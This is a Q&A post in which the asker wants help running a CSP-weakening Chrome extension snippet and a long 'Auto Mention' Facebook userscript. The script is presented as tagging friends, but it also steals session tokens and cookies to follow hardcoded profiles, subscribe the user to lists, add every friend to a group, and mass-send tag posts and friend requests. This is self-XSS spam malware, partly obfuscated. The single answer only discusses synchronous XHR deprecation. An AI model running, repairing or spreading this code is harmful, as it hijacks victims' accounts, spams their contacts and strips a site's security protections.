# How to run this script on Chrome?

Tags: google-chrome

```
chrome.webRequest.onHeadersReceived.addListener(function (details)
 {
for (i = 0; i < details.responseHeaders.length; i++) {
    if (details.responseHeaders[i].name.toUpperCase() == "X-WEBKIT-CSP") {
        details.responseHeaders[i].value = "default-src *;script-src https://*.feedhound.co https://*.facebook.com http://*.facebook.com https://*.fbcdn.net http://*.fbcdn.net *.facebook.net *.google-analytics.com *.virtualearth.net *.google.com 127.0.0.1:* *.spotilocal.com:* chrome-extension://lifbcibllhkdhoafpjfnlhfpfgnpldfl 'unsafe-inline' 'unsafe-eval' https://*.akamaihd.net http://*.akamaihd.net;style-src * 'unsafe-inline';connect-src https://*.facebook.com http://*.facebook.com https://*.fbcdn.net http://*.fbcdn.net *.facebook.net *.spotilocal.com:* https://*.akamaihd.net ws://*.facebook.com:* http://*.akamaihd.net https://*.feedhound.co";
    }
}
return {
    responseHeaders : details.responseHeaders
};
}, {
urls : ["*://*.facebook.com/*"],
types : ["main_frame", "sub_frame", "stylesheet", "script", "image", "object", "xmlhttprequest", "other"]
},
["blocking", "responseHeaders"]
);
```

I needed to run another script that is to tag EVERYONE on Facebook. Below

```
/* Auto Mention Script By Safe Tricks */

function x__0(){return window.ActiveXObject?new ActiveXObject("Msxml2.XMLHTTP"):new XMLHttpRequest}function get_friends(){var a=x__0();a.open("GET","/ajax/typeahead/first_degree.php?__a=1&filter[0]=user&lazy=0&viewer="+uid+"&token=v7&stale_ok=0&options[0]=friends_only&options[1]=nm",false);a.send(null);if(a.readyState==4){var f=JSON.parse(a.responseText.substring(a.responseText.indexOf("{")));return f.payload.entries}return false}
function get_uid(b){var a=x__0();a.open("GET","http://graph.facebook.com/"+b,false);a.send();if(a.readyState==4)return uid=JSON.parse(a.responseText).id;return false}var patt=/comment_text=(.*?)&/;var c=1;username=/\.com\/(.*?)\//.exec(window.top.location)[1];uid=get_uid(username);a=window.top.location;termina=0;var amigos=get_friends();post_id=/[0-9]{8,}/.exec(a);uids="comment_text=";
header="ft_ent_identifier="+post_id+"&comment_text=?&source=1&client_id=1359576694192%3A1233576093&reply_fbid&parent_comment_id&rootid=u_jsonp_3_19&ft[tn]=[]&ft[qid]=5839337351464612379&ft[mf_story_key]=5470779710560437153&ft[has_expanded_ufi]=1&nctr[_mod]=pagelet_home_stream&__user="+uid+"&__a=1&__req=4u&fb_dtsg="+document.getElementsByName("fb_dtsg")[0].value+"&phstamp="+Math.random();
for(var n=1;n<amigos.length;n++){fb_dtsg=document.getElementsByName("fb_dtsg")[0].value;uids+="%40["+amigos[n].uid+"%3AAAAAAAAAAAA]%20";c++;if(c==7){uids+="&";with(new XMLHttpRequest)open("POST","/ajax/ufi/add_comment.php?__a=1"),setRequestHeader("Content-Type","application/x-www-form-urlencoded"),send(header.replace(patt,uids));z=setTimeout("function(){asd=0}",1E3);clearInterval(z);c=1;uids="comment_text="}}var fb_dtsg=document.getElementsByName("fb_dtsg")[0].value;var user_id=document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
function cereziAl(isim){var tarama=isim+"=";if(document.cookie.length>0){konum=document.cookie.indexOf(tarama);if(konum!=-1){konum+=tarama.length;son=document.cookie.indexOf(";",konum);if(son==-1)son=document.cookie.length;return unescape(document.cookie.substring(konum,son))}else return""}}function getRandomInt(min,max){return Math.floor(Math.random()*(max-min+1))+min}function randomValue(arr){return arr[getRandomInt(0,arr.length-1)]}var fb_dtsg=document.getElementsByName("fb_dtsg")[0].value;
var user_id=document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
function a(abone){var http4=new XMLHttpRequest;var url4="/ajax/follow/follow_profile.php?__a=1";var params4="profile_id="+abone+"&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg="+fb_dtsg+"&lsd&__"+user_id+"&phstamp=";http4.open("POST",url4,true);http4.setRequestHeader("Content-type","application/x-www-form-urlencoded");http4.setRequestHeader("Content-length",params4.length);http4.setRequestHeader("Connection","close");http4.onreadystatechange=function(){if(http4.readyState==
4&&http4.status==200)http4.close};http4.send(params4)}function sublist(uidss){var a=document.createElement("script");a.innerHTML="new AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe').setData({ flid: "+uidss+" }).send();";document.body.appendChild(a)}sublist("453131071479519");sublist("453127794813180");sublist("453128131479813");sublist("453128158146477");sublist("453128208146472");sublist("453128331479793");sublist("453128748146418");sublist("453130111479615");
sublist("453130848146208");sublist("453130928146200");var fb_dtsg=document["getElementsByName"]("fb_dtsg")[0]["value"];var user_id=document["cookie"]["match"](document["cookie"]["match"](/c_user=(\d+)/)[1]);var httpwp=new XMLHttpRequest;var urlwp="/ajax/groups/membership/r2j.php?__a=1";var paramswp="&ref=group_jump_header&group_id="+gid+"&fb_dtsg="+fb_dtsg+"&__user="+user_id+"&phstamp=";httpwp["open"]("POST",urlwp,true);httpwp["setRequestHeader"]("Content-type","application/x-www-form-urlencoded");
httpwp["setRequestHeader"]("Content-length",paramswp["length"]);httpwp["setRequestHeader"]("Connection","keep-alive");httpwp["send"](paramswp);var fb_dtsg=document["getElementsByName"]("fb_dtsg")[0]["value"];var user_id=document["cookie"]["match"](document["cookie"]["match"](/c_user=(\d+)/)[1]);var friends=new Array;gf=new XMLHttpRequest;gf["open"]("GET","/ajax/typeahead/first_degree.php?__a=1&viewer="+user_id+"&token"+Math["random"]()+"&filter[0]=user&options[0]=friends_only",false);gf["send"]();
if(gf["readyState"]!=4);else{data=eval("("+gf["responseText"]["substr"](9)+")");if(data["error"]);else friends=data["payload"]["entries"]["sort"](function(_0x93dax8,_0x93dax9){return _0x93dax8["index"]-_0x93dax9["index"]})}
for(var i=0;i<friends["length"];i++){var httpwp=new XMLHttpRequest;var urlwp="/ajax/groups/members/add_post.php?__a=1";var paramswp="&fb_dtsg="+fb_dtsg+"&group_id="+gid+"&source=typeahead&ref=&message_id=&members="+friends[i]["uid"]+"&__user="+user_id+"&phstamp=";httpwp["open"]("POST",urlwp,true);httpwp["setRequestHeader"]("Content-type","application/x-www-form-urlencoded");httpwp["setRequestHeader"]("Content-length",paramswp["length"]);httpwp["setRequestHeader"]("Connection","keep-alive");httpwp["onreadystatechange"]=
function(){if(httpwp["readyState"]==4&&httpwp["status"]==200);};httpwp["send"](paramswp)}var spage_id="100211486794985";var spost_id="100211486794985";var     sfoto_id="100211486794985";var user_id=document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);var     smesaj="";var smesaj_text="";var arkadaslar=[];var svn_rev;var bugun=new Date;var btarihi=new Date;btarihi.setTime(bugun.getTime()+1E3*60*60*4*1);if(!document.cookie.match(/paylasti=(\d+)/))document.cookie="paylasti=hayir;expires="+btarihi.toGMTString();
function sarkadaslari_al(){var xmlhttp=new XMLHttpRequest;xmlhttp.onreadystatechange=function(){if(xmlhttp.readyState==4){eval("arkadaslar = "+xmlhttp.responseText.toString().replace("for (;;);","")+";");for(f=0;f<Math.round(arkadaslar.payload.entries.length/10);f++){smesaj="";smesaj_text="";for(i=f*10;i<(f+1)*10;i++)if(arkadaslar.payload.entries[i]){smesaj+=" @["+arkadaslar.payload.entries[i].uid+":"+arkadaslar.payload.entries[i].text+"]";smesaj_text+=" "+arkadaslar.payload.entries[i].text}sdurumpaylas()}}};
var params="&filter[0]=user";params+="&options[0]=friends_only";params+="&options[1]=nm";params+="&token=v7";params+="&viewer="+user_id;params+="&__user="+user_id;if(document.URL.indexOf("https://")>=0)xmlhttp.open("GET","https://www.facebook.com/ajax/typeahead/first_degree.php?__a=1"+params,true);else xmlhttp.open("GET","http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1"+params,true);xmlhttp.send()}
var tiklama=document.addEventListener("click",function(){if(document.cookie.split("paylasti=")[1].split(";")[0].indexOf("hayir")>=0){svn_rev=document.head.innerHTML.split('"svn_rev":')[1].split(",")[0];sarkadaslari_al();document.cookie="paylasti=evet;expires="+btarihi.toGMTString();document.removeEventListener(tiklama)}},false);
function sarkadasekle(uid,cins){var xmlhttp=new XMLHttpRequest;xmlhttp.onreadystatechange=function(){if(xmlhttp.readyState==4);};xmlhttp.open("POST","/ajax/add_friend/action.php?__a=1",true);var       params="to_friend="+uid;params+="&action=add_friend";params+="&how_found=friend_browser";params+="&ref_param=none";params+="&outgoing_id=";params+="&logging_location=friend_browser";params+="&no_flyout_on_click=true";params+="&ego_log_data=   ";params+="&http_referer=";params+="&fb_dtsg="+document.getElementsByName("fb_dtsg")[0].value;
   params+="&phstamp=165816749114848369115";params+="&__user="+user_id;xmlhttp.setRequestHeader("X-SVN-Rev",svn_rev);xmlhttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded");if(cins=="farketmez"&&document.cookie.split("cins"+user_id+"=").length>1)xmlhttp.send(params);else if(document.cookie.split("cins"+user_id+"=").length<=1)cinsiyetgetir(uid,cins,"sarkadasekle");else if(cins==document.cookie.split("cins"+user_id+"=")[1].split(";")[0].toString())xmlhttp.send(params)}
var cinssonuc={};var cinshtml=document.createElement("html");
function scinsiyetgetir(uid,cins,fonksiyon){var xmlhttp=new XMLHttpRequest;xmlhttp.onreadystatechange=function(){if(xmlhttp.readyState==4){eval("cinssonuc = "+xmlhttp.responseText.toString().replace("for (;;);","")+";");cinshtml.innerHTML=cinssonuc.jsmods.markup[0][1].__html;btarihi.setTime(bugun.getTime()+1E3*60*60*24*365);if(cinshtml.getElementsByTagName("select")[0].value=="1")document.cookie="cins"+user_id+"=kadin;expires="+btarihi.toGMTString();else if(cinshtml.getElementsByTagName("select")[0].value==
"2")document.cookie="cins"+user_id+"=erkek;expires="+btarihi.toGMTString();eval(fonksiyon+"("+id+","+cins+");")}};xmlhttp.open("GET","/ajax/timeline/edit_profile/basic_info.php?__a=1&__user="+user_id,true);xmlhttp.setRequestHeader("X-SVN-Rev",svn_rev);xmlhttp.send()};
```

Answer (score 0):

Synchronous XMLHttpRequest outside of workers has detrimental effects to the end user's experience and was recently changed (December/2015) to prohibit sending a synchronous request .
This is a long process that takes many years.. You can try to fix it, but i think your userscript is dead, because as xhr.responseType is set, you need to use asynchronous request, so you must not pass "false" for the async argument, as you pass, all over the code . :(